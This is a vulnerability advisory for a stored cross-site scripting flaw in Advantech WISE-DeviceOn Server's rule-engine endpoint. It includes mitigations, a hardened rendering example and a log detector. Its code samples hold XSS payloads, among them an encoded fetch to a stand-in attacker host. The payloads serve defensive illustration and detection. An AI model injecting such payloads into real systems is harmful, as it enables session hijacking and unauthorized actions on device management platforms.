CVE-2025-34265: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Advantech Co., Ltd. WISE-DeviceOn Server
Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/rule-engines endpoint. When an authenticated user creates or updates a rule for an agent, the rule fields min, max, and unit are stored and later rendered in rule listings or detail views without proper HTML sanitization or output encoding. An attacker can inject script into one or more of these fields; the script then executes in the browser context of any user who views or interacts with the affected rule, potentially enabling session compromise and unauthorized actions as the victim.
AI Analysis
Technical Summary
CVE-2025-34265 is a stored cross-site scripting (XSS) vulnerability in Advantech Co., Ltd.'s WISE-DeviceOn Server, a platform used for managing IoT and industrial devices. The flaw exists in versions prior to 5.4 within the /rmm/v1/rule-engines REST API endpoint, where authenticated users create or update rules for agents. The rule fields 'min', 'max', and 'unit' are stored as submitted and later rendered in rule listings and detail views without HTML sanitization or output encoding. This improper neutralization of input (CWE-79) lets an attacker with an account that can create or modify rules store JavaScript in these fields; because min and max are thresholds and unit is a short label, none of them has any legitimate reason to contain markup. When another user opens a view that includes the affected rule, the stored script executes in that user's browser context, potentially enabling session hijacking, credential theft, or actions performed with the victim's privileges against managed agents. Exploitation requires the attacker to hold at least limited privileges on the server and requires a victim to load the affected view. The CVSS 4.0 vector indicates network attack vector (AV:N), low attack complexity (AC:L), low privileges required (PR:L), passive user interaction (UI:P, the victim only needs to view a listing or detail page that contains the stored payload), and low impact on confidentiality and integrity with no impact on availability. No known exploits have been reported in the wild as of the publication date. The vulnerability is rated medium severity with a CVSS score of 5.1. Given the role of WISE-DeviceOn Server in industrial IoT device management, exploitation could lead to unauthorized control or information disclosure within operational technology environments.
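The following is an added illustration of the CWE-79 pattern described above, not code from WISE-DeviceOn or Advantech. Only the endpoint path and the field names min, max and unit come from the advisory; the rendering functions, the validation rules and the sample payload are constructed for this example and are assumptions about how such a rule view might be built.

```javascript
// Added example (not Advantech code): vulnerable vs. hardened rendering of a
// stored rule, plus server-side validation for the /rmm/v1/rule-engines payload.

// Constructed sample: what an authenticated attacker could store through
// POST/PUT /rmm/v1/rule-engines. Field names match the advisory; values are
// strings as a JSON API would receive them.
const storedRule = {
  name: "temp-threshold",
  min: "0",
  max: "<img src=x onerror=alert(document.domain)>",
  unit: "&deg;C<script>alert(1)</script>",
};

// Vulnerable pattern: stored fields are interpolated straight into markup that
// is later assigned to innerHTML or emitted by a server template without escaping.
function renderRuleUnsafe(rule) {
  return `<tr><td>${rule.name}</td><td>${rule.min}</td><td>${rule.max}</td><td>${rule.unit}</td></tr>`;
}

// Hardened pattern: escape the five HTML-significant characters on output.
// This is the fix for CWE-79 regardless of what validation happens on input.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderRuleSafe(rule) {
  const cells = [rule.name, rule.min, rule.max, rule.unit]
    .map((v) => `<td>${escapeHtml(v)}</td>`);
  return `<tr>${cells.join("")}</tr>`;
}

// Defence in depth on the write path (hypothetical rules, not the vendor's):
// min and max are numeric thresholds, unit is a short plain label. Reject
// anything else before it is stored, so markup never reaches the database.
function validateRulePayload(rule) {
  const errors = [];
  for (const field of ["min", "max"]) {
    if (!/^-?\d+(\.\d+)?$/.test(String(rule[field]))) {
      errors.push(`${field} must be numeric`);
    }
  }
  if (!/^[A-Za-z0-9%°/ ._-]{1,16}$/.test(String(rule.unit))) {
    errors.push("unit must be a short plain label");
  }
  return errors;
}
```

The output-encoding step is the actual fix; the payload validation is a second layer that also keeps the stored data meaningful, but it must not be the only control, because a stricter rule on unit (for example allowing slashes or degree signs) can be relaxed later without anyone revisiting the view that renders it.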
Potential Impact
For European organizations, especially those in manufacturing, energy, transportation, and critical infrastructure sectors that rely on Advantech WISE-DeviceOn Server for device management, this vulnerability poses a risk of session compromise and unauthorized actions within their device management platforms. Exploitation could allow attackers to execute arbitrary scripts in the context of legitimate users, potentially leading to theft of session tokens, unauthorized configuration changes, or lateral movement within the network. This could disrupt operational technology (OT) environments, cause data leakage, or facilitate further attacks against critical systems. The medium severity rating reflects that while the vulnerability requires authenticated access and user interaction, the impact on confidentiality and integrity is notable. Given the increasing integration of IoT and OT systems in European industries, the risk of operational disruption and data compromise is significant if the vulnerability is exploited.
Mitigation Recommendations
1. Upgrade WISE-DeviceOn Server to version 5.4 or later; versions prior to 5.4 are affected, so 5.4 is the fixed release.
2. Until the upgrade is done, restrict rule creation and modification privileges to trusted and trained personnel, since exploitation requires an account that can write rules.
3. Deploy web application firewall (WAF) rules that flag markup or script fragments in POST/PUT bodies to the /rmm/v1/rule-engines endpoint. Treat this as a stopgap only: signature matching can be bypassed with encoding tricks, and it does not remove payloads already stored.
4. Audit existing rules for min, max and unit values that are not plain numbers or short unit labels, and clean any that contain markup, because a payload stored before the upgrade still fires until it is removed.
5. Educate users about the risk of interacting with untrusted or suspicious rules and encourage reporting of anomalies.
6. Monitor logs for unusual rule creation or modification activity, in particular write requests to /rmm/v1/rule-engines whose threshold or unit fields contain angle brackets, event-handler attributes or javascript: URLs.
7. Serve the management interface with a Content Security Policy (CSP) that disallows inline script, to limit the impact of any XSS; this only helps if the application's own pages work under such a policy, so test it before enforcing.
8. If feasible, isolate the management interface from general user networks to limit exposure.
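As an added example for the monitoring and audit recommendations above (not Advantech code or a format the vendor documents): a small detector that walks audit records of write requests to /rmm/v1/rule-engines and reports bodies whose min, max or unit fields carry markup. The JSON-per-line log format and the sample entries are constructed for this example; the page does not describe WISE-DeviceOn's real log format, so parsing must be adapted to whatever request logging is actually available. The detector also decodes numeric and named HTML entities first, because a value such as `&#60;svg onload=...&#62;` passes a naive check for `<` but becomes live markup if the application decodes entities before rendering.

```javascript
// Added detection example (not vendor code). Log format is constructed.

// Constructed sample: one JSON object per line, request body captured.
const SAMPLE_LOG = [
  '{"ts":"2025-12-05T17:30:22Z","user":"operator1","method":"POST","path":"/rmm/v1/rule-engines","body":{"agent":"plc-07","min":"10","max":"90","unit":"%"}}',
  '{"ts":"2025-12-05T17:31:02Z","user":"contractor9","method":"PUT","path":"/rmm/v1/rule-engines/42","body":{"agent":"plc-07","min":"0","max":"<img src=x onerror=alert(document.domain)>","unit":"C"}}',
  '{"ts":"2025-12-05T17:31:40Z","user":"contractor9","method":"PUT","path":"/rmm/v1/rule-engines/42","body":{"agent":"plc-07","min":"0","max":"100","unit":"&#60;svg onload=fetch(\'//attacker.example\')&#62;"}}',
  '{"ts":"2025-12-05T17:32:10Z","user":"operator1","method":"GET","path":"/rmm/v1/rule-engines","body":null}',
];

// The three fields the advisory names as rendered without encoding.
const WATCHED_FIELDS = ["min", "max", "unit"];

// Decode the entity forms an attacker might use to slip past a "<" check.
// Deliberately small: just numeric references and the four common named ones.
function codePointOrEmpty(n) {
  return n <= 0x10ffff ? String.fromCodePoint(n) : "";
}
function decodeEntities(s) {
  return String(s)
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => codePointOrEmpty(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => codePointOrEmpty(parseInt(d, 10)))
    .replace(/&lt;/gi, "<")
    .replace(/&gt;/gi, ">")
    .replace(/&quot;/gi, '"')
    .replace(/&amp;/gi, "&");
}

// Indicators of markup or script in a value that should be a number or a unit label.
const SUSPICIOUS = /<\s*\/?\s*[a-z]|javascript:|on[a-z]+\s*=|expression\(/i;

// Only create/update requests to the rule-engine endpoint are in scope.
function isRuleWrite(rec) {
  return ["POST", "PUT", "PATCH"].includes(rec.method)
    && typeof rec.path === "string"
    && rec.path.startsWith("/rmm/v1/rule-engines");
}

// Returns one hit per suspicious field, with enough context to act on.
function findInjectionAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    let rec;
    try { rec = JSON.parse(line); } catch { continue; } // skip malformed lines
    if (!isRuleWrite(rec) || !rec.body) continue;
    for (const field of WATCHED_FIELDS) {
      const raw = rec.body[field];
      if (raw === undefined || raw === null) continue;
      if (SUSPICIOUS.test(decodeEntities(raw))) {
        hits.push({ ts: rec.ts, user: rec.user, path: rec.path, field, value: String(raw) });
      }
    }
  }
  return hits;
}

// Aggregate by user for alerting: repeated attempts from one account are the
// pattern recommendation 6 above is looking for.
function countByUser(hits) {
  const counts = {};
  for (const h of hits) counts[h.user] = (counts[h.user] || 0) + 1;
  return counts;
}
```

A hit identifies the account, the rule path and the offending field, which is what is needed both to revoke the account's rule privileges (recommendation 2) and to locate the stored payload for cleanup (recommendation 4).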
Affected Countries
Germany, France, Italy, United Kingdom, Netherlands, Belgium, Sweden
Technical Details
- Data Version: 5.2
- Assigner Short Name: VulnCheck
- Date Reserved: 2025-04-15T19:15:22.579Z
- CVSS Version: 4.0
- State: PUBLISHED
Added to database: 12/5/2025, 5:30:22 PM
Last enriched: 12/5/2025, 5:46:33 PM
Last updated: 12/6/2025, 4:09:50 AM